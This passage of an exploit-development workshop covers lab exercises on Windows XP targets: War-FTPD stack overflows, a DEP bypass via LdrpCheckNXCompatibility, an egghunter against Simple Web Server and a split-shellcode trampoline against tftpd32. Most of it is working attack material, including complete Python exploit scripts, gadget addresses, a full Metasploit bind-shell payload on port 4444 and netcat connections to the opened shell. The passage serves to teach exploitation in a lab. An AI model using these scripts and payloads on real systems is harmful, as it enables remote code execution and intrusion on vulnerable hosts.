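Because the pattern uses only letters and digits, a register that holds something other than pattern bytes (a real address, for instance) comes back as -1, which is the quick way to tell an overwritten register from one that simply points at your buffer.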
  955.  
956. RET – pops the top of the stack into EIP
957. RET 4 – pops the top of the stack into EIP, then adds 4 to ESP (one extra dword is discarded)
  958.  
  959. ---------------------------Type This-----------------------------------
  960.  
  961. cd /home/strategicsec/toolz/metasploit/
  962. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
  963. -----------------------------------------------------------------------
  964.  
  965. 0x7c9c167d push esp; retn 0x304d
  966. 0x7c9d30d7 jmp esp < - how about we use this one
  967. 0x7c9d30eb jmp esp
  968. 0x7c9d30ff jmp esp
  969.  
  970.  
971. Open warftpd3.py with Notepad++
972. Fill in the appropriate values:
973. Distance to EIP (485, from pattern_offset above)
974. Address of JMP ESP (the one chosen from the msfpescan output above)
  975.  
  976.  
  977. ---------------------------Type This-----------------------------------
  978.  
  979. c:\python27\python.exe warftpd3.py XPSP3-ED-Target-IP
  980.  
  981. 0:003> dd eip
  982. 0:003> dd esp
  983. -----------------------------------------------------------------------
  984.  
  985.  
  986.  
  987.  
  988.  
989. Notes: bad characters (bytes the target mangles or truncates on) must be left out of the shellcode.
990. Run this last step with no debugger attached to war-ftpd.exe.
  991.  
  992.  
  993. ---------------------------Type This-----------------------------------
  994.  
  995. c:\python27\python.exe warftpd4.py XPSP3-ED-Target-IP
  996.  
  997. nc XPSP3-ED-Target-IP 4444
  998. -----------------------------------------------------------------------
  999.  
  1000.  
  1001.  
  1002. ###########################################
  1003. # Lab 1b: Stack Overflows with DEP Bypass #
  1004. ###########################################
  1005.  
  1006. Reboot your target host and choose the "2nd" option for DEP.
  1007.  
  1008.  
  1009.  
  1010.  
  1011. ---------------------------Type This-----------------------------------
  1012.  
  1013. c:\python27\python.exe warftpd1.py XPSP3-ED-Target-IP
  1014.  
  1015. At WINDBG prompt
  1016. “r” to show registers or “alt+4”
  1017.  
  1018. dd esp
  1019.  
  1020.  
  1021.  
  1022.  
  1023. c:\python27\python.exe warftpd2.py XPSP3-ED-Target-IP
  1024.  
  1025.  
  1026. At WINDBG prompt
  1027. “r” to show registers or “alt+4”
  1028. dd esp
  1029. -----------------------------------------------------------------------
  1030.  
  1031. Eip: 32714131
  1032. esp: affd58 (71413471)
  1033.  
  1034. Now we need to SSH into the StrategicSec Ubuntu host
  1035.  
  1036. ---------------------------Type This-----------------------------------
  1037.  
  1038. cd /home/strategicsec/toolz/metasploit/tools
  1039.  
  1040. ruby pattern_offset.rb 32714131
  1041. 485
  1042.  
  1043. ruby pattern_offset.rb 71413471
  1044. 493
1045. 
  1057. cd /home/strategicsec/toolz/metasploit/
  1058.  
  1059. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7
  1060.  
  1061.  
  1062.  
  1063. c:\python27\python.exe warftpd3.py XPSP3-ED-Target-IP
  1064.  
  1065. 0:003> dd eip
  1066. 0:003> dd esp
  1067.  
  1068. INT3s - GOOD!!!!!!!
  1069.  
  1070.  
  1071.  
  1072. c:\python27\python.exe warftpd4.py XPSP3-ED-Target-IP
  1073.  
  1074. nc XPSP3-ED-Target-IP 4444
  1075. -----------------------------------------------------------------------
1076. 
1077. 
1078. strategicsec....exploit no workie!!!!
1079. 
1080. 
1081. Why????????? DEP!!!!!!!!!!!!!
1082. 
1083. 
  1086. Let's look through ole32.dll for the following instructions:
  1087.  
  1088. mov al,0x1
  1089. ret 0x4
  1090.  
  1091. We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.
  1092.  
  1093.  
  1094. ---------------------------Type This-----------------------------------
  1095.  
  1096. ./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
  1097. -----------------------------------------------------------------------
  1098.  
  1099. [DLLs/xpsp3/ole32.dll]
  1100. 0x775ee00e b001c204
  1101. 0x775ee00e mov al, 1
  1102. 0x775ee010 ret 4
  1103.  
  1104.  
  1105. Then we need to jump to the LdrpCheckNXCompatibility routine in
  1106. ntdll.dll that disables DEP.
  1107.  
  1108.  
  1109.  
  1110. Inside of ntdll.dll we need to find the following instructions:
  1111.  
  1112. CMP AL,1
  1113. PUSH 2
  1114. POP ESI
  1115. JE ntdll.7
  1116.  
  1117.  
  1118. ---------------------------Type This-----------------------------------
  1119.  
  1120. ./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
  1121. -----------------------------------------------------------------------
  1122.  
  1123. [DLLs/xpsp3/ntdll.dll]
  1124. 0x7c91cd24 3c016a025e0f84
  1125. 0x7c91cd24 cmp al, 1
  1126. 0x7c91cd26 push 2
  1127. 0x7c91cd28 pop esi
  1128. 0x7c91cd29 jz 7
  1129.  
  1130.  
1131. This set of instructions checks that AL is 1, pushes 2 onto the stack and pops it into ESI, and, because AL is 1,
1132. takes the jump into the part of LdrpCheckNXCompatibility that disables DEP for the process.
  1133.  
  1134.  
  1135.  
  1136.  
  1137. ---------------------------Type This-----------------------------------
  1138.  
  1139. dep = "\x0e\xe0\x5e\x77"+\
  1140. "\xff\xff\xff\xff"+\
  1141. "\x24\xcd\x91\x7c"+\
  1142. "\xff\xff\xff\xff"+\
  1143. "A"*0x54
  1144.  
  1145.  
  1146.  
  1147.  
  1148. c:\python27\python.exe warftpd5.py XPSP3-ED-Target-IP
  1149.  
  1150. nc XPSP3-ED-Target-IP 4444
  1151. -----------------------------------------------------------------------
  1152.  
  1153.  
  1154. ########################################
  1155. # Lab 2a: Not Enough Space (Egghunter) #
  1156. ########################################
  1157.  
  1158. -----------------------------------------------------------------------
  1159.  
  1160. SWS - SIMPLE WEB SERVER
  1161. -----------------------
  1162.  
  1163. Running SWS on Strategicsec-XP-ED-Target-VM
  1164. Start > Programs > Simple Web Server (it's in the middle somewhere)
  1165. Red icon in system tray
  1166. Double click it
  1167. - it will pop up a menu
  1168. - select "start"
  1169. - dialog box shows starting params - port 82
  1170.  
  1171. WinDBG
  1172. - attach to "server.exe"
  1173.  
  1174. ---------------------------Type This-----------------------------------
  1175.  
  1176. c:\python27\python.exe sws1.py XPSP3-ED-Target-IP
  1177.  
  1178. 0:003> dd eip
  1179. 0:003> dd esp
  1180.  
  1181. c:\python27\python.exe sws2.py XPSP3-ED-Target-IP
  1182.  
  1183. 0:003> dd eip
  1184. 0:003> dd esp
  1185.  
  1186. SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
  1187. cd /home/strategicsec/toolz/metasploit/tools
  1188. ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
  1189. ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
  1190.  
  1191. -----------------------------------------------------------------------
  1192.  
  1193.  
  1194.  
  1195.  
  1196.  
  1197.  
  1198.  
1199. EGGHUNTER:
1200. ----------
1201. 
1202. "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
1203. "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
1204.          ^^^^^^^^^^^^^^^^                                ^^^^^^^^
1205. 
1206. The 16 marked characters are mov eax, "ABBA": the egg the hunter searches memory for.
1207. The last two bytes (\xFF\xE7) are the jump into the payload found right after the egg.
1208. 
1209. GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
1210. User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
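To see why the tag is sent doubled ("ABBAABBA") while the hunter itself only carries it once, here is a Python 3 model of the search loop, as an added example that is not one of the workshop's sws scripts. It runs over a constructed dictionary of 4 KB pages standing in for process memory; the page addresses, the 0x10000/0x30000 bases and the marker bytes are all made up for the example. Like the hunter, it skips an unmapped page in one step, walks a mapped page byte by byte, and only stops when the tag appears twice in a row.

```python
# Added example, not part of the lab files: model of the egghunter's search over a
# constructed dict {page_base: page_bytes}; pages absent from the dict are "unmapped".
PAGE = 0x1000
EGG = b"ABBA"        # the tag the hunter loads with mov eax, 0x41424241


def read(memory, addr, n):
    """Return n bytes starting at addr, or None if any of them lie on an unmapped page."""
    out = b""
    while n > 0:
        base = addr & ~(PAGE - 1)
        page = memory.get(base)
        if page is None:
            return None
        chunk = page[addr - base:addr - base + n]
        if not chunk:
            return None              # page shorter than PAGE bytes: treat as unmapped
        out += chunk
        addr += len(chunk)
        n -= len(chunk)
    return out


def hunt(memory, start, egg=EGG, limit=0x7fffffff):
    """Return the address just past the first doubled tag (egg+egg), or -1.

    Mirrors the hunter's control flow: an unmapped page is skipped whole
    (or dx,0xfff / inc edx), a mapped one is compared byte by byte, and the tag
    must match twice in a row (the two scasd) so the single copy of the tag
    inside the hunter's own code is not mistaken for the payload.
    """
    tag = egg + egg
    addr = start
    while addr < limit:
        if (addr & ~(PAGE - 1)) not in memory:
            addr = (addr | (PAGE - 1)) + 1   # jump to the next page
            continue
        if read(memory, addr, len(tag)) == tag:
            return addr + len(tag)           # jmp edi: execution continues after the egg
        addr += 1
    return -1


def sample_memory():
    """Constructed address space: the hunter's page holds one copy of the tag,
    the pages after it are unmapped, and the payload page holds the doubled tag."""
    hunter_page = (b"\x90" * 16 + EGG + b"\x90" * 12).ljust(PAGE, b"\x00")
    payload_page = (b"\x00" * 100 + EGG + EGG + b"\xcc" * 50).ljust(PAGE, b"\x00")
    return {0x10000: hunter_page, 0x30000: payload_page}   # 0x11000..0x2ffff unmapped


if __name__ == "__main__":
    mem = sample_memory()
    print("payload starts at 0x%x" % hunt(mem, 0x10000))   # 0x3006c
```

The single "ABBA" at offset 16 of the hunter's page is passed over because the four bytes after it are NOPs, not a second tag; the search then skips the unmapped gap page by page and stops 108 bytes into the payload page, right after "ABBAABBA". The real hunter does the mapped-page test with a system call rather than a dictionary lookup, but the two outcomes it distinguishes are the same.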
  1211.  
  1212.  
  1213.  
  1214.  
1215. -----sws3.py-----
1216. #!/usr/bin/python2
1217. import os
1218. import sys
1219. import socket
1220. import struct # for pack function
1221. 
1222. if len(sys.argv) < 2:
1223.     sys.stderr.write("Usage: sws3.py <host>\n")
1224.     sys.exit(1)
1225. 
1226. 
1227. target = sys.argv[1]
1228. port = 82
1229. 
1230. 
1231. pad = "A" * 225 # distance to EIP
1232. eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
1233. 
1234. # the egghunter: searches memory for the tag "ABBA" twice in a row
1235. egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
1236. egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
1237. 
1238. shellcode = "\xCC" * 700 # placeholder: INT3s, replace with the real (Alpha2 encoded) payload
1239. 
1240. buf = "GET /"
1241. buf += pad + struct.pack('<I', eip) + egghunter # request line: overflow, EIP, hunter
1242. buf += " HTTP/1.0\r\n"
1243. buf += "User-Agent: ABBAABBA" # the doubled tag marks where the payload starts
1244. buf += shellcode
1245. buf += " HTTP/1.0\r\n"
1246. 
1247. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # for TCP
1248. # s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) for UDP
1249. 
1250. try:
1251.     s.connect((target, port))
1252.     s.sendall(buf)
1253. except Exception as e:
1254.     sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
1255. finally:
1256.     s.close()
1257. sys.stderr.write("Sent.\n")
1258. -----
  1258.  
  1259. ############################################
  1260. # Lab 2b: Not Enough Space (Negative Jump) #
  1261. ############################################
  1262.  
  1263.  
  1264.  
1265. -----------------------------------------------------------------------
1266. 
1267. Buffer layout (lowest address on the left):
1268. 
1269. [pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
1270. 
1271. 1. Overflow the buffer: the whole string, up through jmp_min, is written over the stack and over the SEH record,
1272.    so the next-SEH pointer becomes jmp4 and the handler address becomes eip.
1273. 2. Jump over the SEH record: jmp4 is two NOPs and a short jump of +4, which skips the handler address and lands on jmp_min.
1274. 3. POP 2 words off the stack: eip points at a POP POP RET, whose RET lands on the next-SEH pointer, i.e. on jmp4.
1275. 4. Negative jump into the NOPs, then into the shellcode: jmp_min is a near jump of 0xFFFFEF98 = -4200 bytes, back
1276.    to the start of the pad, from where execution slides down into the shellcode.
1277. 
1278. At run time the order is 1, 3, 2, 4: the exception handler runs first, and everything else follows from its RET.
1279. 
  1282.  
  1283.  
  1284. #########################################
  1285. # Lab 2c: Not Enough Space (Trampoline) #
  1286. #########################################
  1287.  
  1288. ---------------------------Type This-----------------------------------
  1289.  
  1290. cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
  1291. -----------------------------------------------------------------------
  1292.  
  1293.  
  1294. On the Strategicsec-XP-ED-Target-VM VM
  1295.  
  1296. - open a command prompt
  1297. - c:\software\tftpd32
  1298. - run tftpd32.exe
  1299. - UDP port 69
  1300. (socket code is already in the scripts)
  1301.  
  1302.  
  1303.  
  1304.  
  1305. On your attack host please install:
  1306.  
  1307.  
  1308. NASM - Netwide Assembler
1309. 
1310. 
  1317. We want to generate the shellcode (BIND SHELL on Port 4444)
  1318. - No restricted characters
  1319. - Encoder: NONE
  1320.  
  1321. Create a Python file called dumpshellcode.py
  1322.  
  1323. ---
  1324. #!/usr/bin/python2
  1325.  
  1326. import os
  1327. import sys
  1328. import struct
  1329.  
  1330.  
  1331. # win32_bind - EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
  1332. shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  1333. shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  1334. shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  1335. shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  1336. shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  1337. shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  1338. shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  1339. shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  1340. shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  1341. shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  1342. shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  1343. shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  1344. shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  1345. shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  1346. shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  1347. shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  1348. shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  1349. shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  1350. shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  1351. shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  1352.  
  1353. sys.stdout.write(shellcode)
  1354. ---
  1355.  
  1356.  
  1357.  
1358. python dumpshellcode.py > bindshell.bin
1359. 
1360. copy bindshell.bin into the "c:\Program Files\nasm" directory
  1361.  
  1362.  
  1363.  
1364. Here we saved the raw shellcode generated by Metasploit into a file called bindshell.bin; wc -c shows its size:
1365. 317 bindshell.bin
  1366.  
  1367. ---------------------------Type This-----------------------------------
  1368.  
  1369. C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
  1370. -----------------------------------------------------------------------
  1371.  
  1372. 00000000 FC cld
  1373. 00000001 6AEB push byte -0x15
  1374. 00000003 4D dec ebp
  1375. 00000004 E8F9FFFFFF call dword 0x2
  1376. 00000009 60 pushad
  1377. 0000000A 8B6C2424 mov ebp,[esp+0x24]
  1378. 0000000E 8B453C mov eax,[ebp+0x3c]
  1379. 00000011 8B7C0578 mov edi,[ebp+eax+0x78]
  1380. 00000015 01EF add edi,ebp
  1381. 00000017 8B4F18 mov ecx,[edi+0x18]
  1382. 0000001A 8B5F20 mov ebx,[edi+0x20]
  1383. 0000001D 01EB add ebx,ebp
  1384. 0000001F 49 dec ecx
  1385. 00000020 8B348B mov esi,[ebx+ecx*4]
  1386. 00000023 01EE add esi,ebp
  1387. 00000025 31C0 xor eax,eax
  1388. 00000027 99 cdq
  1389. 00000028 AC lodsb
  1390. 00000029 84C0 test al,al
  1391. 0000002B 7407 jz 0x34
  1392. 0000002D C1CA0D ror edx,0xd
  1393. 00000030 01C2 add edx,eax
  1394. 00000032 EBF4 jmp short 0x28
  1395. 00000034 3B542428 cmp edx,[esp+0x28]
  1396. 00000038 75E5 jnz 0x1f
  1397. 0000003A 8B5F24 mov ebx,[edi+0x24]
  1398. 0000003D 01EB add ebx,ebp
  1399. 0000003F 668B0C4B mov cx,[ebx+ecx*2]
  1400. 00000043 8B5F1C mov ebx,[edi+0x1c]
  1401. 00000046 01EB add ebx,ebp
  1402. 00000048 032C8B add ebp,[ebx+ecx*4]
  1403. 0000004B 896C241C mov [esp+0x1c],ebp
  1404. 0000004F 61 popad
  1405. 00000050 C3 ret
  1406. 00000051 31DB xor ebx,ebx
  1407. 00000053 648B4330 mov eax,[fs:ebx+0x30]
  1408. 00000057 8B400C mov eax,[eax+0xc]
  1409. 0000005A 8B701C mov esi,[eax+0x1c]
  1410. 0000005D AD lodsd
  1411. 0000005E 8B4008 mov eax,[eax+0x8]
  1412. 00000061 5E pop esi
  1413. 00000062 688E4E0EEC push dword 0xec0e4e8e
  1414. 00000067 50 push eax
  1415. 00000068 FFD6 call esi
  1416. 0000006A 6653 push bx
  1417. 0000006C 66683332 push word 0x3233
  1418. 00000070 687773325F push dword 0x5f327377
  1419. 00000075 54 push esp
  1420. 00000076 FFD0 call eax
  1421. 00000078 68CBEDFC3B push dword 0x3bfcedcb
  1422. 0000007D 50 push eax
  1423. 0000007E FFD6 call esi PART 1
  1424. 00000080 5F pop edi
  1425. 00000081 89E5 mov ebp,esp
  1426. 00000083 6681ED0802 sub bp,0x208
  1427. 00000088 55 push ebp
  1428. 00000089 6A02 push byte +0x2
  1429. 0000008B FFD0 call eax
  1430. 0000008D 68D909F5AD push dword 0xadf509d9
  1431. 00000092 57 push edi
  1432. 00000093 FFD6 call esi
  1433. 00000095 53 push ebx
  1434. 00000096 53 push ebx
  1435. --------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
  1436. 00000097 53 push ebx
  1437. 00000098 53 push ebx
  1438. 00000099 53 push ebx
  1439. 0000009A 43 inc ebx
  1440. 0000009B 53 push ebx
  1441. 0000009C 43 inc ebx
  1442. 0000009D 53 push ebx PART 2
  1443. 0000009E FFD0 call eax
  1444. 000000A0 6668115C push word 0x5c11
  1445. 000000A4 6653 push bx
  1446. 000000A6 89E1 mov ecx,esp
  1447. 000000A8 95 xchg eax,ebp
  1448. 000000A9 68A41A70C7 push dword 0xc7701aa4
  1449. 000000AE 57 push edi
  1450. 000000AF FFD6 call esi
  1451. 000000B1 6A10 push byte +0x10
  1452. 000000B3 51 push ecx
  1453. 000000B4 55 push ebp
  1454. 000000B5 FFD0 call eax
  1455. 000000B7 68A4AD2EE9 push dword 0xe92eada4
  1456. 000000BC 57 push edi
  1457. 000000BD FFD6 call esi
  1458. 000000BF 53 push ebx
  1459. 000000C0 55 push ebp
  1460. 000000C1 FFD0 call eax
  1461. 000000C3 68E5498649 push dword 0x498649e5
  1462. 000000C8 57 push edi
  1463. 000000C9 FFD6 call esi
  1464. 000000CB 50 push eax
  1465. 000000CC 54 push esp
  1466. 000000CD 54 push esp
  1467. 000000CE 55 push ebp
  1468. 000000CF FFD0 call eax
  1469. 000000D1 93 xchg eax,ebx
  1470. 000000D2 68E779C679 push dword 0x79c679e7
  1471. 000000D7 57 push edi
  1472. 000000D8 FFD6 call esi
  1473. 000000DA 55 push ebp
  1474. 000000DB FFD0 call eax
  1475. 000000DD 666A64 push word 0x64
  1476. 000000E0 6668636D push word 0x6d63
  1477. 000000E4 89E5 mov ebp,esp
  1478. 000000E6 6A50 push byte +0x50
  1479. 000000E8 59 pop ecx
  1480. 000000E9 29CC sub esp,ecx
  1481. 000000EB 89E7 mov edi,esp
  1482. 000000ED 6A44 push byte +0x44
  1483. 000000EF 89E2 mov edx,esp
  1484. 000000F1 31C0 xor eax,eax
  1485. 000000F3 F3AA rep stosb
  1486. 000000F5 FE422D inc byte [edx+0x2d]
  1487. 000000F8 FE422C inc byte [edx+0x2c]
  1488. 000000FB 93 xchg eax,ebx
  1489. 000000FC 8D7A38 lea edi,[edx+0x38]
  1490. 000000FF AB stosd
  1491. 00000100 AB stosd
  1492. 00000101 AB stosd
  1493. 00000102 6872FEB316 push dword 0x16b3fe72
  1494. 00000107 FF7544 push dword [ebp+0x44]
  1495. 0000010A FFD6 call esi
  1496. 0000010C 5B pop ebx
  1497. 0000010D 57 push edi
  1498. 0000010E 52 push edx
  1499. 0000010F 51 push ecx
  1500. 00000110 51 push ecx
  1501. 00000111 51 push ecx
  1502. 00000112 6A01 push byte +0x1
  1503. 00000114 51 push ecx
  1504. 00000115 51 push ecx
  1505. 00000116 55 push ebp
  1506. 00000117 51 push ecx
  1507. 00000118 FFD0 call eax
  1508. 0000011A 68ADD905CE push dword 0xce05d9ad
  1509. 0000011F 53 push ebx
  1510. 00000120 FFD6 call esi
  1511. 00000122 6AFF push byte -0x1
  1512. 00000124 FF37 push dword [edi]
  1513. 00000126 FFD0 call eax
  1514. 00000128 8B57FC mov edx,[edi-0x4]
  1515. 0000012B 83C464 add esp,byte +0x64
  1516. 0000012E FFD6 call esi
  1517. 00000130 52 push edx
  1518. 00000131 FFD0 call eax
  1519. 00000133 68F08A045F push dword 0x5f048af0
  1520. 00000138 53 push ebx
  1521. 00000139 FFD6 call esi
  1522. 0000013B FFD0 call eax
  1523.  
  1524.  
  1525.  
  1526.  
  1527. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
  1528. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
  1529. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
  1530. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
  1531. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
  1532. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
  1533. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
  1534. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
  1535. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
  1536. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
  1537.  
  1538.  
  1539. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
  1540. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
  1541. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
  1542. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
  1543. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
  1544. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
  1545. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
  1546. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
  1547. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
  1548. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
  1549. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
  1550.  
  1551.  
  1552. STACK SHIFTER:
  1553. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
  1554. prepend += "\x44" # inc esp
1555. 
1556. 
1569. ---- final script ----
1570. 
1571. #!/usr/bin/python2
1572. #TFTP Server remote Buffer Overflow
1573. 
1574. import sys
1575. import socket
1576. import struct
1577. 
1578. if len(sys.argv) < 2:
1579.     sys.stderr.write("Usage: tftpd.py <host>\n")
1580.     sys.exit(1)
1581. 
1582. target = sys.argv[1]
1583. port = 69
1584. 
1585. eip = 0x7e429353 # jmp esp in USER32.DLL
1586. 
1587. # shellcode part 1: everything up to the CUT mark in the disassembly above
1588. part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
1588. part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
1589. part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
1590. part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
1591. part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
1592. part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
1593. part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
1594. part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
1595. part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
1596. part1 += "\xf5\xad\x57\xff\xd6\x53\x53"
1597. 
1598. # shellcode part 2: the rest, from the CUT mark to the end
1598. part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
1599. part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
1600. part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
1601. part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
1602. part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
1603. part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
1604. part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
1605. part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
1606. part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
1607. part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
1608. part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"
1609. 
1610. # stack shifter: moves ESP 0x1000 bytes down so the shellcode's pushes do not overwrite the buffer
1610. prepend = "\x81\xC4\xFF\xEF\xFF\xFF" # add esp, -1001h
1611. prepend += "\x44" # inc esp
1612. 
1613. buf = "\x00\x01" # receive command
1614. 
1615. buf += "\x90" * (256 - len(part2)) # NOPs
1616. buf += part2 # shellcode part 2
1617. buf += struct.pack('<I', eip) # EIP (JMP ESP)
1618. buf += prepend # stack shifter
1619. buf += part1 # shellcode part 1
1620. buf += "\xE9" + struct.pack('<i', -380) # JMP -380, back into the NOPs in front of part 2
1621. buf += "\x00" # END
1622. 
1623. # print buf
1624. 
